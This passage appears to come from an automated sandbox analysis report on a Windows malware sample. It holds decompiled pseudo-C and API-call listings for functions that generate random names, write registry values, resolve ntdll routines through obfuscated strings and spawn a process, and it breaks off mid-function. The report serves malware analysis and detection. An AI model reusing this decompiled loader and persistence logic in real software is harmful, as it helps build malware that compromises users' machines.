                                  • Part of subcall function 0481624D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,048170D9,?,00000000,048170D9,00000000,068D9630), ref: 048162BF
                                • StrTrimA.SHLWAPI(00000000,048192AC,?,068D9630), ref: 0481489D
                                  • Part of subcall function 048121C1: lstrlen.KERNEL32(068D87FA,00000000,00000000,00000000,04817100,00000000), ref: 048121D1
                                  • Part of subcall function 048121C1: lstrlen.KERNEL32(?), ref: 048121D9
                                  • Part of subcall function 048121C1: lstrcpy.KERNEL32(00000000,068D87FA), ref: 048121ED
                                  • Part of subcall function 048121C1: lstrcat.KERNEL32(00000000,?), ref: 048121F8
                                • lstrcpy.KERNEL32(00000000,?), ref: 048148BD
                                • lstrcat.KERNEL32(00000000,?), ref: 048148CF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 048148D5
                                  • Part of subcall function 04814AA6: lstrlen.KERNEL32(?,00000000,068D9C98,74ECC740,048113D0,068D9E9D,048155DE,048155DE,?,048155DE,?,63699BC3,E8FA7DD7,00000000), ref: 04814AAD
                                  • Part of subcall function 04814AA6: mbstowcs.NTDLL ref: 04814AD6
                                  • Part of subcall function 04814AA6: memset.NTDLL ref: 04814AE8
                                • wcstombs.NTDLL ref: 04814966
                                  • Part of subcall function 0481161A: SysAllocString.OLEAUT32(00000000), ref: 0481165B
                                  • Part of subcall function 048150CA: HeapFree.KERNEL32(00000000,00000000,04814239,00000000,00000001,?,00000000,?,?,?,04816B8D,00000000,?,00000001), ref: 048150D6
                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 048149A7
                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 048149B7
                                • HeapFree.KERNEL32(00000000,00000000,?,068D9630), ref: 048149C7
                                • HeapFree.KERNEL32(00000000,?), ref: 048149D7
                                • HeapFree.KERNEL32(00000000,?), ref: 048149E5
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                • String ID:
                                • API String ID: 972889839-0
                                • Opcode ID: 3bf8a6ef337dccf64f72a5a187015ce2835c2aefbe42f2c37ebcb0e5ada56589
                                • Instruction ID: 6c01c79c524f186f458177fad0c4ccb8708139596670efa243269908fdb15bc3
                                • Opcode Fuzzy Hash: 3bf8a6ef337dccf64f72a5a187015ce2835c2aefbe42f2c37ebcb0e5ada56589
                                • Instruction Fuzzy Hash: 70A17CB1601109EFDB11EFA8DC88E9A3BACEF48754F154922F809D7270D779E950CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04815927, Relevance: 13.6, APIs: 9, Instructions: 112stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 27%
                                			E04815927(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x481a38c; // 0x68d9ba0
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E04814E1B(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x48191ac;
				}
				_t46 = E048142F0(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E04816837(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x481a2d4; // 0x20bd5a8
						_t16 = _t75 + 0x481baa8; // 0x530025
						 *0x481a138(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E04814E1B(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x48191b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E04816837(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E048150CA(_v20);
						} else {
							_t66 =  *0x481a2d4; // 0x20bd5a8
							_t31 = _t66 + 0x481bbc8; // 0x73006d
							 *0x481a138(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E048150CA(_v12);
				}
				return _v24;
			}




























                                0x0481592f
                                0x04815935
                                0x0481593c
                                0x04815942
                                0x04815946
                                0x0481594a
                                0x0481594d
                                0x04815954
                                0x04815957
                                0x04815959
                                0x04815959
                                0x04815962
                                0x04815969
                                0x0481596c
                                0x04815972
                                0x0481597c
                                0x04815985
                                0x0481598c
                                0x048159a5
                                0x048159ac
                                0x048159af
                                0x048159b8
                                0x048159c1
                                0x048159d2
                                0x048159db
                                0x048159df
                                0x048159e3
                                0x048159ea
                                0x048159ed
                                0x048159ef
                                0x048159ef
                                0x048159f9
                                0x04815a02
                                0x04815a09
                                0x04815a21
                                0x04815a25
                                0x04815a62
                                0x04815a27
                                0x04815a2a
                                0x04815a32
                                0x04815a43
                                0x04815a4f
                                0x04815a57
                                0x04815a5b
                                0x04815a5b
                                0x04815a25
                                0x04815a6a
                                0x04815a6f
                                0x04815a76

                                APIs
                                • GetTickCount.KERNEL32 ref: 0481593C
                                • lstrlen.KERNEL32(?,80000002,00000005), ref: 0481597C
                                • lstrlen.KERNEL32(00000000), ref: 04815985
                                • lstrlen.KERNEL32(00000000), ref: 0481598C
                                • lstrlenW.KERNEL32(80000002), ref: 04815999
                                • lstrlen.KERNEL32(?,00000004), ref: 048159F9
                                • lstrlen.KERNEL32(?), ref: 04815A02
                                • lstrlen.KERNEL32(?), ref: 04815A09
                                • lstrlenW.KERNEL32(?), ref: 04815A10
                                  • Part of subcall function 048150CA: HeapFree.KERNEL32(00000000,00000000,04814239,00000000,00000001,?,00000000,?,?,?,04816B8D,00000000,?,00000001), ref: 048150D6
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: lstrlen$CountFreeHeapTick
                                • String ID:
                                • API String ID: 2535036572-0
                                • Opcode ID: ae7caf65b5677443362a3d311e3508f9d0b07ec9179f387f7a4e5ad74fa838da
                                • Instruction ID: c019d0c4f73be7e444d88e20d1d6b38d94c05235654a3c2370b94bef9886db3f
                                • Opcode Fuzzy Hash: ae7caf65b5677443362a3d311e3508f9d0b07ec9179f387f7a4e5ad74fa838da
                                • Instruction Fuzzy Hash: 5F417A72D00209FFCF11AFA4DC44A9E7BB9EF48318F050952ED04E7221E779AA50EB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 048151A8, Relevance: 13.6, APIs: 9, Instructions: 110librarymemoryloaderCOMMON
                                Download Yara Rule
                                C-Code - Quality: 61%
                                			E048151A8(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t39;
				intOrPtr _t43;
				intOrPtr _t50;
				void* _t52;
				intOrPtr _t53;
				void* _t61;
				intOrPtr* _t66;
				intOrPtr* _t73;
				intOrPtr* _t76;

				_t1 = __eax + 0x14; // 0x74183966
				_t71 =  *_t1;
				_t39 = E04814F5A(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t39;
				if(_t39 != 0) {
					L12:
					return _v8;
				}
				E048177A4( *((intOrPtr*)(_t71 + 0xc)),  *((intOrPtr*)(_t71 + 8)), _v12);
				_t43 = _v12(_v12);
				_v8 = _t43;
				if(_t43 == 0 && ( *0x481a2b8 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t50 =  *0x481a2d4; // 0x20bd5a8
					_t18 = _t50 + 0x481b4a3; // 0x73797325
					_t52 = E04816343(_t18);
					_v12 = _t52;
					if(_t52 == 0) {
						_v8 = 8;
					} else {
						_t53 =  *0x481a2d4; // 0x20bd5a8
						_t20 = _t53 + 0x481b770; // 0x68d8d18
						_t21 = _t53 + 0x481b0af; // 0x4e52454b
						_t66 = GetProcAddress(GetModuleHandleA(_t21), _t20);
						if(_t66 == 0) {
							_v8 = 0x7f;
						} else {
							_t73 = __imp__;
							_v108 = 0x44;
							 *_t73(0);
							_t61 =  *_t66(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32);
							 *_t73(1);
							if(_t61 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x481a290, 0, _v12);
					}
				}
				_t76 = _v16;
				 *((intOrPtr*)(_t76 + 0x18))( *((intOrPtr*)(_t76 + 0x1c))( *_t76));
				E048150CA(_t76);
				goto L12;
			}



















                                0x048151b1
                                0x048151b1
                                0x048151bf
                                0x048151c8
                                0x048151cb
                                0x048152dd
                                0x048152e4
                                0x048152e4
                                0x048151da
                                0x048151e2
                                0x048151e7
                                0x048151ea
                                0x048151ff
                                0x04815205
                                0x04815206
                                0x04815209
                                0x0481520f
                                0x04815212
                                0x04815217
                                0x0481521f
                                0x04815226
                                0x0481522d
                                0x04815230
                                0x048152c4
                                0x04815236
                                0x04815236
                                0x0481523b
                                0x04815242
                                0x04815256
                                0x0481525a
                                0x048152ab
                                0x0481525c
                                0x0481525c
                                0x04815263
                                0x0481526a
                                0x04815282
                                0x04815288
                                0x0481528c
                                0x048152a6
                                0x0481528e
                                0x04815297
                                0x0481529c
                                0x0481529c
                                0x0481528c
                                0x048152bc
                                0x048152bc
                                0x04815230
                                0x048152cb
                                0x048152d4
                                0x048152d8
                                0x00000000

                                APIs
                                  • Part of subcall function 04814F5A: GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,048151C4,?,?,?,?,00000000,00000000), ref: 04814F7F
                                  • Part of subcall function 04814F5A: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04814FA1
                                  • Part of subcall function 04814F5A: GetProcAddress.KERNEL32(00000000,614D775A), ref: 04814FB7
                                  • Part of subcall function 04814F5A: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04814FCD
                                  • Part of subcall function 04814F5A: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04814FE3
                                  • Part of subcall function 04814F5A: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04814FF9
                                • memset.NTDLL ref: 04815212
                                  • Part of subcall function 04816343: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,0481522B,73797325), ref: 04816354
                                  • Part of subcall function 04816343: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 0481636E
                                • GetModuleHandleA.KERNEL32(4E52454B,068D8D18,73797325), ref: 04815249
                                • GetProcAddress.KERNEL32(00000000), ref: 04815250
                                • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 0481526A
                                • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 04815288
                                • CloseHandle.KERNEL32(00000000), ref: 04815297
                                • CloseHandle.KERNEL32(?), ref: 0481529C
                                • GetLastError.KERNEL32 ref: 048152A0
                                • HeapFree.KERNEL32(00000000,?), ref: 048152BC
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemset
                                • String ID:
                                • API String ID: 91923200-0
                                • Opcode ID: 5362cca98439e5eb48728a111cf84d6d97fa7241f0540a61365e2921bc70ed21
                                • Instruction ID: fda172122ea509ad2090c2926aeec178d4e4a94a55ad2c881cca81bcfa068f8e
                                • Opcode Fuzzy Hash: 5362cca98439e5eb48728a111cf84d6d97fa7241f0540a61365e2921bc70ed21
                                • Instruction Fuzzy Hash: B63168B2A01219FFDB11AFE4C848ADEBFBCEF48304F104952E505E3120D379AA45DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0481624D, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 64%
                                			E0481624D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x481a2d4; // 0x20bd5a8
				_t1 = _t9 + 0x481b60c; // 0x253d7325
				_t36 = 0;
				_t28 = E0481278C(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x68d9631
					_t40 = E04816837(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t36 = E048149FE(_t33, _t34, _t40, _a8);
						E048150CA(_t40);
						_t42 = E04817565(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E048150CA(_t36);
							_t36 = _t42;
						}
						_t43 = E048152E5(_t36, _t33);
						if(_t43 != 0) {
							E048150CA(_t36);
							_t36 = _t43;
						}
					}
					E048150CA(_t28);
				}
				return _t36;
			}















                                0x0481624d
                                0x04816250
                                0x04816251
                                0x04816258
                                0x0481625f
                                0x04816266
                                0x0481626a
                                0x04816271
                                0x04816278
                                0x0481627d
                                0x04816285
                                0x0481628f
                                0x04816293
                                0x04816297
                                0x0481629d
                                0x048162a2
                                0x048162b2
                                0x048162b4
                                0x048162cb
                                0x048162cf
                                0x048162d2
                                0x048162d7
                                0x048162d7
                                0x048162e0
                                0x048162e4
                                0x048162e7
                                0x048162ec
                                0x048162ec
                                0x048162e4
                                0x048162ef
                                0x048162f4
                                0x048162fa

                                APIs
                                  • Part of subcall function 0481278C: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04816266,253D7325,00000000,00000000,?,00000000,048170D9), ref: 048127F3
                                  • Part of subcall function 0481278C: sprintf.NTDLL ref: 04812814
                                • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,048170D9,00000000,068D9630), ref: 04816278
                                • lstrlen.KERNEL32(00000000,?,00000000,048170D9,00000000,068D9630), ref: 04816280
                                  • Part of subcall function 04816837: RtlAllocateHeap.NTDLL(00000000,00000000,04814197), ref: 04816843
                                • strcpy.NTDLL ref: 04816297
                                • lstrcat.KERNEL32(00000000,00000000), ref: 048162A2
                                  • Part of subcall function 048149FE: lstrlen.KERNEL32(00000000,00000000,048170D9,00000000,?,048162B1,00000000,048170D9,?,00000000,048170D9,00000000,068D9630), ref: 04814A0F
                                  • Part of subcall function 048150CA: HeapFree.KERNEL32(00000000,00000000,04814239,00000000,00000001,?,00000000,?,?,?,04816B8D,00000000,?,00000001), ref: 048150D6
                                • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,048170D9,?,00000000,048170D9,00000000,068D9630), ref: 048162BF
                                  • Part of subcall function 04817565: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,048162CB,00000000,?,00000000,048170D9,00000000,068D9630), ref: 0481756F
                                  • Part of subcall function 04817565: _snprintf.NTDLL ref: 048175CD
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                • String ID: =
                                • API String ID: 2864389247-1428090586
                                • Opcode ID: 97c628792b20b10bf827a223b63a449582b88d76d1f3d5419f05390d8a84251a
                                • Instruction ID: a2f15eed2620c48db641d123bdc38746654f4ce5247952ff17c5b497aa88c1ec
                                • Opcode Fuzzy Hash: 97c628792b20b10bf827a223b63a449582b88d76d1f3d5419f05390d8a84251a
                                • Instruction Fuzzy Hash: 0111E3739012257757127BAC9C54C7F369DDF856283054E57F905E7220DEB8EC0297E2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04812902, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON
                                Download Yara Rule
                                APIs
                                • SysAllocString.OLEAUT32(?), ref: 0481295E
                                • SysAllocString.OLEAUT32(0070006F), ref: 04812972
                                • SysAllocString.OLEAUT32(00000000), ref: 04812984
                                • SysFreeString.OLEAUT32(00000000), ref: 048129E8
                                • SysFreeString.OLEAUT32(00000000), ref: 048129F7
                                • SysFreeString.OLEAUT32(00000000), ref: 04812A02
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: String$AllocFree
                                • String ID:
                                • API String ID: 344208780-0
                                • Opcode ID: 94b56276adf9679101ec9b04ada86e2c4f77281e3be3c8ba1de1375b2a1b2b96
                                • Instruction ID: 2b27f2affa62ddaf14a51ce814060bd3a4fa66f07714872c9a41ccb407cac651
                                • Opcode Fuzzy Hash: 94b56276adf9679101ec9b04ada86e2c4f77281e3be3c8ba1de1375b2a1b2b96
                                • Instruction Fuzzy Hash: F2312C72D00609AFDB01EFACD848A9FB7BAAF49311F144966ED10FB120DB75AD05CB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04814F5A, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E04814F5A(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E04816837(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x481a2d4; // 0x20bd5a8
					_t1 = _t23 + 0x481b11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x481a2d4; // 0x20bd5a8
					_t2 = _t26 + 0x481b792; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E048150CA(_t54);
					} else {
						_t30 =  *0x481a2d4; // 0x20bd5a8
						_t5 = _t30 + 0x481b77f; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x481a2d4; // 0x20bd5a8
							_t7 = _t33 + 0x481b74e; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x481a2d4; // 0x20bd5a8
								_t9 = _t36 + 0x481b72e; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x481a2d4; // 0x20bd5a8
									_t11 = _t39 + 0x481b7a2; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E04814248(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                0x04814f69
                                0x04814f6d
                                0x0481502f
                                0x04814f73
                                0x04814f73
                                0x04814f78
                                0x04814f8b
                                0x04814f8d
                                0x04814f92
                                0x04814f9a
                                0x04814fa1
                                0x04814fa5
                                0x04814fa8
                                0x04815027
                                0x04815028
                                0x04814faa
                                0x04814faa
                                0x04814faf
                                0x04814fb7
                                0x04814fbb
                                0x04814fbe
                                0x00000000
                                0x04814fc0
                                0x04814fc0
                                0x04814fc5
                                0x04814fcd
                                0x04814fd1
                                0x04814fd4
                                0x00000000
                                0x04814fd6
                                0x04814fd6
                                0x04814fdb
                                0x04814fe3
                                0x04814fe7
                                0x04814fea
                                0x00000000
                                0x04814fec
                                0x04814fec
                                0x04814ff1
                                0x04814ff9
                                0x04814ffd
                                0x04815000
                                0x00000000
                                0x04815002
                                0x04815008
                                0x0481500d
                                0x04815014
                                0x0481501b
                                0x0481501e
                                0x00000000
                                0x04815020
                                0x04815023
                                0x04815023
                                0x0481501e
                                0x04815000
                                0x04814fea
                                0x04814fd4
                                0x04814fbe
                                0x04814fa8
                                0x0481503d

                                APIs
                                  • Part of subcall function 04816837: RtlAllocateHeap.NTDLL(00000000,00000000,04814197), ref: 04816843
                                • GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,048151C4,?,?,?,?,00000000,00000000), ref: 04814F7F
                                • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04814FA1
                                • GetProcAddress.KERNEL32(00000000,614D775A), ref: 04814FB7
                                • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04814FCD
                                • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04814FE3
                                • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04814FF9
                                  • Part of subcall function 04814248: memset.NTDLL ref: 048142C7
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: AddressProc$AllocateHandleHeapModulememset
                                • String ID:
                                • API String ID: 1886625739-0
                                • Opcode ID: 4656ae204aad5d2bc1ae60d67090fdc29226b1e2f42d914cc53702b35c2d0473
                                • Instruction ID: cbe1ca85301f2866ea0aaa1f262ffc2d6c31666b851d20c029910f52d873ef67
                                • Opcode Fuzzy Hash: 4656ae204aad5d2bc1ae60d67090fdc29226b1e2f42d914cc53702b35c2d0473
                                • Instruction Fuzzy Hash: F1213DB170124AAFD750EFA9D944E9A77ECEB48744B054E27E409C7222E779F901CFA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04811D57, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 88%
                                			E04811D57(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x481a38c);
					_t91 = 0x80000002;
					L6:
					_t59 = E04814AA6( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E04817702(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E048150CA(_a8);
						goto L29;
					}
					_t64 =  *0x481a2cc; // 0x68d9c98
					_t16 = _t64 + 0xc; // 0x68d9d8c
					_t65 = E04814AA6(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d048190
						if(E04815F2A(_t97,  *_t33, _t91, _a8,  *0x481a384,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x481a2d4; // 0x20bd5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x481b9e0; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x481b9db; // 0x55434b48
								_t69 = _t34;
							}
							if(E04815927(_t69,  *0x481a384,  *0x481a388,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x481a2d4; // 0x20bd5a8
									_t44 = _t71 + 0x481b86a; // 0x74666f53
									_t73 = E04814AA6(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d048190
										E04811F7A( *_t47, _t91, _a8,  *0x481a388, _a24);
										_t49 = _t101 + 0x10; // 0x3d048190
										E04811F7A( *_t49, _t91, _t99,  *0x481a380, _a16);
										E048150CA(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d048190
									E04811F7A( *_t40, _t91, _a8,  *0x481a388, _a24);
									_t43 = _t101 + 0x10; // 0x3d048190
									E04811F7A( *_t43, _t91, _a8,  *0x481a380, _a16);
								}
								if( *_t101 != 0) {
									E048150CA(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d048190
					_t81 = E04816A36( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d048190
							E04815F2A(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E048150CA(_t100);
						_t98 = _a16;
					}
					E048150CA(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E048177A4(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x481a38c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}























                                0x04811d57
                                0x04811d60
                                0x04811d67
                                0x04811d6c
                                0x04811dd9
                                0x04811ddf
                                0x04811de4
                                0x04811deb
                                0x04811df2
                                0x04811df5
                                0x04811f60
                                0x04811f67
                                0x04811f67
                                0x04811f6c
                                0x04811f6e
                                0x04811f6e
                                0x04811f77
                                0x04811f77
                                0x04811dfb
                                0x04811e07
                                0x04811f56
                                0x04811f59
                                0x00000000
                                0x04811f59
                                0x04811e0d
                                0x04811e12
                                0x04811e15
                                0x04811e1c
